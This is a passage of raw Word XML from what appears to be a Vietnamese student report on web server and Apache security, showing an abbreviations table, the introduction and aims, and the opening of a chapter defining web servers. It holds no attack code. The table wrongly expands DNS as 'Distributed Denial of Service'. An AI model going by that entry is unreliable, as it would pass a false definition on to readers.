          </w:tcPr>
          <w:p w14:paraId="529776D0" w14:textId="75FD130C" w:rsidR="00F872EA" w:rsidRDefault="004B31A0" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="004B31A0">
              <w:t>Distributed Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F872EA" w14:paraId="5BA17F60" w14:textId="77777777" w:rsidTr="00F872EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="395D2705" w14:textId="69B91213" w:rsidR="00F872EA" w:rsidRDefault="004B31A0" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="004B31A0">
              <w:t>DoS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6139" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45AEBD50" w14:textId="368181B6" w:rsidR="00F872EA" w:rsidRDefault="004B31A0" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="004B31A0">
              <w:t>Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F872EA" w14:paraId="749001B1" w14:textId="77777777" w:rsidTr="00F872EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DA0737E" w14:textId="2029E17B" w:rsidR="00F872EA" w:rsidRDefault="004B31A0" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="004B31A0">
              <w:t>DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6139" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F7B9F02" w14:textId="1B213EC9" w:rsidR="00F872EA" w:rsidRDefault="004B31A0" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="004B31A0">
              <w:t>Distributed Denial of Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F872EA" w14:paraId="6E3F3E7B" w14:textId="77777777" w:rsidTr="00F872EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="539DC7C7" w14:textId="19999AA6" w:rsidR="00F872EA" w:rsidRDefault="001C7B65" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="001C7B65">
              <w:t>SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6139" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67060D75" w14:textId="25E1DD1A" w:rsidR="00F872EA" w:rsidRDefault="001C7B65" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="001C7B65">
              <w:t>Secure Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F872EA" w14:paraId="7F1F5349" w14:textId="77777777" w:rsidTr="00F872EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B4CF3FE" w14:textId="2DD4B4A7" w:rsidR="00F872EA" w:rsidRDefault="007D52B7" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>VPN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6139" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2238FBC4" w14:textId="4CF6AC26" w:rsidR="00F872EA" w:rsidRDefault="007D52B7" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Virtual Private Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00161026" w14:paraId="6405D48A" w14:textId="77777777" w:rsidTr="00F872EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62D75D02" w14:textId="4E1853C4" w:rsidR="00161026" w:rsidRDefault="007D52B7" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>IDPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6139" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B18085D" w14:textId="7E1A62FB" w:rsidR="00161026" w:rsidRDefault="00581E9F" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Intrusion Detection and Prevention System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D52B7" w14:paraId="4ADF84D2" w14:textId="77777777" w:rsidTr="00F872EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CC7CF19" w14:textId="5CCF288C" w:rsidR="007D52B7" w:rsidRDefault="00581E9F" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>IDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6139" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4860F68E" w14:textId="561A6D16" w:rsidR="007D52B7" w:rsidRDefault="00581E9F" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Intrusion Detection System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D52B7" w14:paraId="63F83411" w14:textId="77777777" w:rsidTr="00F872EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78656F66" w14:textId="0B98CB88" w:rsidR="007D52B7" w:rsidRDefault="00581E9F" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>IPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6139" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="666FA41F" w14:textId="675EADA1" w:rsidR="007D52B7" w:rsidRDefault="00581E9F" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Intrusion Prevention System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D52B7" w14:paraId="1D7BBAE9" w14:textId="77777777" w:rsidTr="00F872EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A89C453" w14:textId="6A76F54C" w:rsidR="007D52B7" w:rsidRDefault="007C0A15" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6139" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="523D8748" w14:textId="459CFC29" w:rsidR="007D52B7" w:rsidRDefault="007C0A15" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Remote Code Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007D52B7" w14:paraId="2535C934" w14:textId="77777777" w:rsidTr="00F872EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3256" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46E1AED2" w14:textId="074EF0DB" w:rsidR="007D52B7" w:rsidRDefault="007C0A15" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>CGI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6139" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AFC898D" w14:textId="0AB531EC" w:rsidR="007D52B7" w:rsidRDefault="007C0A15" w:rsidP="00C444FA">
            <w:pPr>
              <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Common Gateway Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C5E4E70" w14:textId="603A8035" w:rsidR="00F872EA" w:rsidRDefault="004F1393" w:rsidP="00F872EA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5826B6B7" w14:textId="14A94239" w:rsidR="00EC0288" w:rsidRDefault="00EC0288" w:rsidP="004F1393">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:sectPr w:rsidR="00EC0288" w:rsidSect="00EE6F74">
          <w:footerReference w:type="default" r:id="rId8"/>
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1134" w:right="1134" w:bottom="1418" w:left="1701" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="lowerRoman" w:start="1"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6612A0BC" w14:textId="7BCFD1AA" w:rsidR="00A84998" w:rsidRPr="00D8314E" w:rsidRDefault="00EF16AF" w:rsidP="00374E11">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc171085473"/>
      <w:r w:rsidRPr="00D8314E">
        <w:lastRenderedPageBreak/>
        <w:t>LỜI MỞ ĐẦU</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="4021028C" w14:textId="3D73D0D4" w:rsidR="00EF16AF" w:rsidRDefault="00EF16AF" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="284" w:hanging="284"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc171085474"/>
      <w:r>
        <w:t>Tính cấp thiết của đề tài</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="17D39ACD" w14:textId="0E01764F" w:rsidR="00962E8B" w:rsidRPr="00962E8B" w:rsidRDefault="00962E8B" w:rsidP="007A4C08">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00962E8B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sự ra đời của Internet cùng với sự phát triển ngày càng mạnh mẽ của nó đã mang lại cho con người nói chung và các doanh nghiệp nói riêng rất nhiều tiện ích. Các hoạt động giao dịch trực tuyến như thương mại điện tử hay thanh toán online ngày càng phổ biến và được thực hiện thông qua các ứng dụng Web. Ở bất kỳ đâu, khi một máy tính có nối mạng Internet, con người có thể thực hiện các giao dịch của mình một cách thuận tiện và nhanh chóng. Mọi thông tin của người dùng sẽ được lưu trên WebServer. Nếu như thông tin đó được sửa đổi với ý đồ xấu, câu truy vấn cơ sở dữ liệu có thể bị thay đổi cấu trúc, từ đó kết quả trả về sẽ khác với ý muốn của người lập trình, hoặc những kẻ mạo danh có thể đánh cắp thông tin, gây nên những thiệt hại lớn. Có thể thấy việc xây dựng các trang Web động cho phép xây dựng câu truy vấn từ đầu vào do người sử dụng cung cấp, chúng tiềm ẩn nguy cơ mất an toàn cao nếu như không có một cơ chế kiểm tra dữ liệu đầu vào một cách chặt chẽ. Các ứng dụng Web luôn luôn tiềm ẩn và có nguy cơ bị tấn công bởi các kẻ tấn công với ý đồ xấu, vậy nên vấn đề bảo mật và phát hiện tấn công thay đổi trên Web luôn là cấp thiết</w:t>
      </w:r>
      <w:r w:rsidR="00AD4BDB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE65BDA" w14:textId="69247AFB" w:rsidR="00962E8B" w:rsidRDefault="00962E8B" w:rsidP="007A4C08">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00962E8B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Chính vì vậy đề tài </w:t>
      </w:r>
      <w:r w:rsidRPr="00962E8B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>“Nghiên cứu về vấn đề bảo mật cho Web Server”</w:t>
      </w:r>
      <w:r w:rsidRPr="00962E8B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> sẽ cung cấp những thông tin hữu ích về Web Server tạo điều kiện cho việc xây dựng và bảo mật</w:t>
      </w:r>
      <w:r w:rsidR="00AD4BDB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D320A3" w14:textId="7EA6E8E4" w:rsidR="00962E8B" w:rsidRDefault="00962E8B" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="284" w:hanging="284"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc171085475"/>
      <w:r>
        <w:t>Mục tiêu nghiên cứu của đề tài</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="3B1C1C1B" w14:textId="07F0320E" w:rsidR="00962E8B" w:rsidRPr="00903007" w:rsidRDefault="00903007" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1134"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Hiểu rõ về Web Server đi sâu nghiên cứu về Apache và cách thức hoạt động của Apache</w:t>
      </w:r>
      <w:r w:rsidR="00E35055">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188A8C5F" w14:textId="5F1D73CC" w:rsidR="00903007" w:rsidRPr="00362F25" w:rsidRDefault="00362F25" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1134"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Các vấn đề bảo mật trên Web server và Apache</w:t>
      </w:r>
      <w:r w:rsidR="00E35055">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394814C1" w14:textId="0B052307" w:rsidR="00362F25" w:rsidRPr="00837145" w:rsidRDefault="00837145" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1134"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nắm được các CVE phổ biển trên Apache</w:t>
      </w:r>
      <w:r w:rsidR="00E35055">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EE7C14" w14:textId="1FEABA98" w:rsidR="00E35055" w:rsidRDefault="00D8314E" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1134"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Đưa ra được các giải pháp bảo mật trên Apache</w:t>
      </w:r>
      <w:r w:rsidR="00E35055">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E8F062" w14:textId="7C43FF8B" w:rsidR="00F040D6" w:rsidRDefault="00F040D6" w:rsidP="00E35055">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:sectPr w:rsidR="00F040D6" w:rsidSect="00EE6F74">
          <w:pgSz w:w="12240" w:h="15840" w:code="1"/>
          <w:pgMar w:top="1134" w:right="1134" w:bottom="1418" w:left="1701" w:header="720" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:fmt="lowerRoman" w:start="1"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07DB94C0" w14:textId="34D2B9C9" w:rsidR="007B3B64" w:rsidRDefault="007B3B64" w:rsidP="009C40C1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc171085476"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>CHƯƠNG 1: GIỚI THIỆU CHUNG VỀ WEB SERVER</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="6B85BAE8" w14:textId="07449C8A" w:rsidR="007B3B64" w:rsidRDefault="007A4C08" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="7" w:name="_Toc171085477"/>
      <w:r w:rsidR="004B0441">
        <w:t>Khái niệm về Web Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="3F925336" w14:textId="243321DF" w:rsidR="00881EB6" w:rsidRDefault="00A3706C" w:rsidP="007A4C08">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Web Server là máy chủ web, là máy chứa đựng nội dung của website, chúng có vai trò liên kết với các mạng máy tính. Tất cả các website, mạng xã hội, ứng dụng trực tuyến đều cần có Web Server để phân phối nội dung tới người dùng. Nhờ có Web Server, người dùng có thể truy cập xem nội dung, hình ảnh viedeo trên các trang web nhanh chóng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220F2B75" w14:textId="06D68AF6" w:rsidR="00A3706C" w:rsidRDefault="00A3706C" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="8" w:name="_Toc171085478"/>
      <w:r w:rsidR="00D71A7B">
        <w:t>Chức năng của Web Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="0DF75042" w14:textId="0323788B" w:rsidR="00D71A7B" w:rsidRDefault="00D71A7B" w:rsidP="007A4C08">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Web Server được sử dụng để xử lí các yêu cầu cũng như phản hồi của HTTP từ máy client và quản lí, lưu trữ, bảo vệ thông tin dữ liệu của Website</w:t>
      </w:r>
      <w:r w:rsidR="006D1F1E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C326657" w14:textId="25523289" w:rsidR="00D71A7B" w:rsidRDefault="002A1E5D" w:rsidP="007A4C08">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Một Web Server cũng có thể thực hiện một số chức năng khác như:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9770F9" w14:textId="14E62A52" w:rsidR="002A1E5D" w:rsidRPr="006D1F1E" w:rsidRDefault="006D1F1E" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00830CAC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Kiểm soát băng thông điều tiết lưu lượng mạng:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web Server có thể giúp loại bỏ thời gian ngừng hoạt động do lưu lượng truy cập Web cao. Web Server có thể đặt băng thông để quản lí tốc độ truyền dữ liệu qua Internet và giảm lưu lượng mạng dư thừa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE961DD" w14:textId="15C18EB9" w:rsidR="00632E29" w:rsidRPr="00632E29" w:rsidRDefault="00632E29" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00830CAC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lưu trữ ảo:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web Server cũng có thể được sử dụng làm server ảo để chạy các dịch vụ khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672B140B" w14:textId="336FC891" w:rsidR="00632E29" w:rsidRDefault="00632E29" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="9" w:name="_Toc171085479"/>
      <w:r w:rsidR="00D8614C">
        <w:t>Cách thức hoạt động của Web Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="4D19BCE1" w14:textId="7240A6FB" w:rsidR="009A5E53" w:rsidRDefault="00E50607" w:rsidP="007A4C08">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Người dùng thực hiện các yêu cầu thông qua trình duyệt Web. Giao tiếp giữa trình duyệt Web và Web Server diễn ra bằng HTTP. Web Server sử dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36765854" w14:textId="5B5E07C9" w:rsidR="00E50607" w:rsidRPr="006D5F00" w:rsidRDefault="006D5F00" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00830CAC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lưu trữ vật lí:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tất cả dữ liệu trang Web được lưu trữ trên Web Server để đảm bảo an toàn. Khi người dùng nhập URL hoặc từ khóa của trang Web một yêu cầu sẽ được tạo và gửi đến Web Server để thực hiện xử lí.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D364DF9" w14:textId="33BE6ACE" w:rsidR="006D5F00" w:rsidRPr="00E213BC" w:rsidRDefault="002505E1" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="00830CAC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Trình duyệt Web:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
